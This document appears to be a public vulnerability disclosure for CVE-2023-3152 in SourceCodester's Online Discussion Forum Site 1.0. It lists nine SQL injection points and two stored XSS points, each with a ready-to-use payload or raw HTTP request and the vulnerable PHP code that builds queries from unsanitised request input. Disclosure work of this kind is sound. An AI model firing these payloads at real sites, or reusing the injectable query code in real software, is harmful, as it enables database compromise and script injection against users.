Headline
CVE-2023-3152: Vulnerability/Online Discussion Forum Site - multiple vulnerabilities.md at main · Peanut886/Vulnerability
A vulnerability classified as critical has been found in SourceCodester Online Discussion Forum Site 1.0. This affects an unknown part of the file admin\posts\view_post.php. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-231021 was assigned to this vulnerability.
**Exploit Title: Online Discussion Forum Site - multiple vulnerabilities****Date: 2023-06/07****Exploit Author: Peanut886****Vendor Homepage: https://www.sourcecodester.com****Software Link: https://www.sourcecodester.com/download-code?nid=15337&title=Online+Discussion+Forum+Site+in+PHP%2FOOP+Free+Source+Code****Version: 1.0****Tested on: windows10 + phpstudy******1.SQL injection vulnerability in posts\view_post.php****
Sample request POC #1
http://odfs.com/?p=posts/view_post&id=1%27%20OR%20(SELECT%205314%20FROM(SELECT%20COUNT(*),CONCAT(0x71627a6a71,(SELECT%20(ELT(5314=5314,1))),0x7176787a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27wAaE%27=%27wAaE
Sqlmap running results #1
Related Codes posts\view_post.php
<?php
if(isset($_GET['id'])){
$qry = $conn->query("SELECT p.*, u.username, u.avatar, c.name as `category` FROM `post_list` p inner join category_list c on p.category_id = c.id inner join `users` u on p.user_id = u.id where p.id= '{$_GET['id']}'");
if($qry->num_rows > 0){
foreach($qry->fetch_array() as $k => $v){
if(!is_numeric($k)){
$$k = $v;
}
}
}else{
echo '<script> alert("Post ID is not recognized."; location.replace("./p=posts");</script>';
}
}else{
echo '<script> alert("Post ID is required"; location.replace("./p=posts");</script>';
}
?>
****2.SQL injection vulnerability in user\manage_user.php****
Sample request POC #2
http://odfs.com/?p=user/manage_user&id=1%27%20OR%20(SELECT%206959%20FROM(SELECT%20COUNT(*),CONCAT(0x71627a6a71,(SELECT%20(ELT(6959=6959,1))),0x716b766b71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27xbbY%27=%27xbbY
Sqlmap running results #2
Related Codes user\manage_user.php
<?php
if(isset($_GET['id'])){
$user = $conn->query("SELECT * FROM users where id ='{$_GET['id']}' ");
foreach($user->fetch_array() as $k =>$v){
$meta[$k] = $v;
}
}
?>
****3.SQL injection vulnerability in posts\manage_post.php****
Sample request POC #3
http://odfs.com/?p=posts/manage_post&id=1%27%20AND%20(SELECT%201667%20FROM%20(SELECT(SLEEP(5)))KDHo)%20AND%20%27yeqR%27=%27yeqR
Sqlmap running results #3
Related Codes posts\manage_post.php
<?php
if(isset($_GET['id'])){
$qry = $conn->query("SELECT * FROM `post_list` where id= '{$_GET['id']}' and user_id = '{$_settings->userdata('id')}'");
if($qry->num_rows > 0){
foreach($qry->fetch_array() as $k => $v){
if(!is_numeric($k)){
$$k = $v;
}
}
}
}
?>
****4.SQL injection vulnerability in admin\user\manage_user.php****
Sample request POC #4
http://odfs.com/?p=admin/user/manage_user&id=1%27%20OR%20(SELECT%204186%20FROM(SELECT%20COUNT(*),CONCAT(0x71766b6a71,(SELECT%20(ELT(4186=4186,1))),0x71786b7a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27RAfl%27=%27RAfl
Sqlmap running results #4
Related Codes admin\user\manage_user.php
<?php
if(isset($_GET['id'])){
$user = $conn->query("SELECT * FROM users where id ='{$_GET['id']}' ");
foreach($user->fetch_array() as $k =>$v){
$meta[$k] = $v;
}
}
?>
****5.SQL injection vulnerability in admin\posts\view_post.php****
Sample request POC #5
http://odfs.com/?p=admin/posts/view_post&id=1%27%20OR%20(SELECT%203303%20FROM(SELECT%20COUNT(*),CONCAT(0x7162627671,(SELECT%20(ELT(3303=3303,1))),0x716a6a7871,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27DgHr%27=%27DgHr
Sqlmap running results #5
Related Codes admin\posts\view_post.php
<?php
if(isset($_GET['id'])){
$qry = $conn->query("SELECT p.*, u.username, u.avatar, c.name as `category` FROM `post_list` p inner join category_list c on p.category_id = c.id inner join `users` u on p.user_id = u.id where p.id= '{$_GET['id']}'");
if($qry->num_rows > 0){
foreach($qry->fetch_array() as $k => $v){
if(!is_numeric($k)){
$$k = $v;
}
}
}else{
echo '<script> alert("Post ID is not recognized."; location.replace("./p=posts");</script>';
}
}else{
echo '<script> alert("Post ID is required"; location.replace("./p=posts");</script>';
}
?>
****6.SQL injection vulnerability in admin\posts\manage_post.php****
Sample request POC #6
http://odfs.com/?p=admin/posts/manage_post&id=1%27%20OR%20(SELECT%206705%20FROM(SELECT%20COUNT(*),CONCAT(0x7162716a71,(SELECT%20(ELT(6705=6705,1))),0x7162706a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27xWgO%27=%27xWgO
Sqlmap running results #6
Related Codes admin\posts\manage_post.php
<?php
if(isset($_GET['id'])){
$qry = $conn->query("SELECT * FROM `post_list` where id= '{$_GET['id']}' ");
if($qry->num_rows > 0){
foreach($qry->fetch_array() as $k => $v){
if(!is_numeric($k)){
$$k = $v;
}
}
}
}
?>
****7.SQL injection vulnerability in admin\categories\view_category.php****
Sample request POC #7
GET /admin/categories/view_category.php?id=4 HTTP/1.1
Host: odfs.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://odfs.com/admin/?page=categories
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hbfgm77d947f3hrk84gd6u9r8s
Connection: close
Sqlmap running results #7
Related Codes admin\categories\view_category.php
<?php
require_once('../../config.php');
if(isset($_GET['id']) && $_GET['id'] > 0){
$qry = $conn->query("SELECT * from `category_list` where id = '{$_GET['id']}' ");
if($qry->num_rows > 0){
foreach($qry->fetch_assoc() as $k => $v){
$$k=$v;
}
}
}
?>
****8.SQL injection vulnerability in admin\categories\manage_category.php****
Sample request POC #8
GET /admin/categories/manage_category.php?id=4 HTTP/1.1
Host: odfs.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://odfs.com/admin/?page=categories
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hbfgm77d947f3hrk84gd6u9r8s
Connection: close
Sqlmap running results #8
Related Codes admin\categories\manage_category.php
<?php
require_once('../../config.php');
if(isset($_GET['id']) && $_GET['id'] > 0){
$qry = $conn->query("SELECT * from `category_list` where id = '{$_GET['id']}' ");
if($qry->num_rows > 0){
foreach($qry->fetch_assoc() as $k => $v){
$$k=$v;
}
}
}
?>
****9.SQL injection vulnerability in classes\Users.php(POST)****
Sample request POC #9
POST /classes/Users.php?f=registration HTTP/1.1
Host: odfs.com
Content-Length: 857
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWVcezwGAZd9UURw7
Origin: http://odfs.com
Referer: http://odfs.com/register.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hbfgm77d947f3hrk84gd6u9r8s
Connection: close
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="id"
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="type"
2
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="firstname"
1
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="middlename"
22
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="lastname"
33
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="username"
123
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="password"
321
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryWVcezwGAZd9UURw7--
Sqlmap running results #9
Related Codes classes\Users.php(POST)
function registration(){
if(!empty($_POST['password']))
$_POST['password'] = md5($_POST['password']);
else
unset($_POST['password']);
extract($_POST);
$data = "";
$check = $this->conn->query("SELECT * FROM `users` where username = '{$username}' ".($id > 0 ? " and id!='{$id}'" : "")." ")->num_rows;
if($check > 0){
$resp['status'] = 'failed';
$resp['msg'] = 'Username already exists.';
return json_encode($resp);
}
****10.Xss vulnerability in admin\posts\manage_post.php(title)****
Sample request POC #10
POST /classes/Master.php?f=save_post HTTP/1.1
Host: odfs.com
Content-Length: 602
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywn2OqIAtW9RRog2w
Origin: http://odfs.com
Referer: http://odfs.com/?p=posts/manage_post
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hbfgm77d947f3hrk84gd6u9r8s
Connection: close
------WebKitFormBoundarywn2OqIAtW9RRog2w
Content-Disposition: form-data; name="id"
------WebKitFormBoundarywn2OqIAtW9RRog2w
Content-Disposition: form-data; name="title"
11<script>alert(111)</script>
------WebKitFormBoundarywn2OqIAtW9RRog2w
Content-Disposition: form-data; name="category_id"
4
------WebKitFormBoundarywn2OqIAtW9RRog2w
Content-Disposition: form-data; name="content"
<p>asd</p>
------WebKitFormBoundarywn2OqIAtW9RRog2w
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarywn2OqIAtW9RRog2w--
Sample response results #10
Related Codes admin\posts\manage_post.php(title)
<div class="form-group">
<label for="title" class="control-label">Title</label>
<input type="text" class="form-control rounded-0" name="title" id="title" value="<?= isset($title) ? $title : "" ?>">
</div>
****11.Xss vulnerability in admin\posts\manage_post.php(content)****
Sample request POC #11
POST /classes/Master.php?f=save_post HTTP/1.1
Host: odfs.com
Content-Length: 605
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTTVOK61sOtujLolB
Origin: http://odfs.com
Referer: http://odfs.com/?p=posts/manage_post
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hbfgm77d947f3hrk84gd6u9r8s
Connection: close
------WebKitFormBoundaryTTVOK61sOtujLolB
Content-Disposition: form-data; name="id"
------WebKitFormBoundaryTTVOK61sOtujLolB
Content-Disposition: form-data; name="title"
111
------WebKitFormBoundaryTTVOK61sOtujLolB
Content-Disposition: form-data; name="category_id"
4
------WebKitFormBoundaryTTVOK61sOtujLolB
Content-Disposition: form-data; name="content"
<script>alert(123)</script>
------WebKitFormBoundaryTTVOK61sOtujLolB
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryTTVOK61sOtujLolB--
Sample response results #11
Related Codes admin\posts\manage_post.php(content)
<div class="form-group">
<label for="content" class="control-label">Content</label>
<textarea type="text" class="form-control rounded-0" name="content" id="content"><?= isset($content) ? $content : "" ?></textarea>
</div>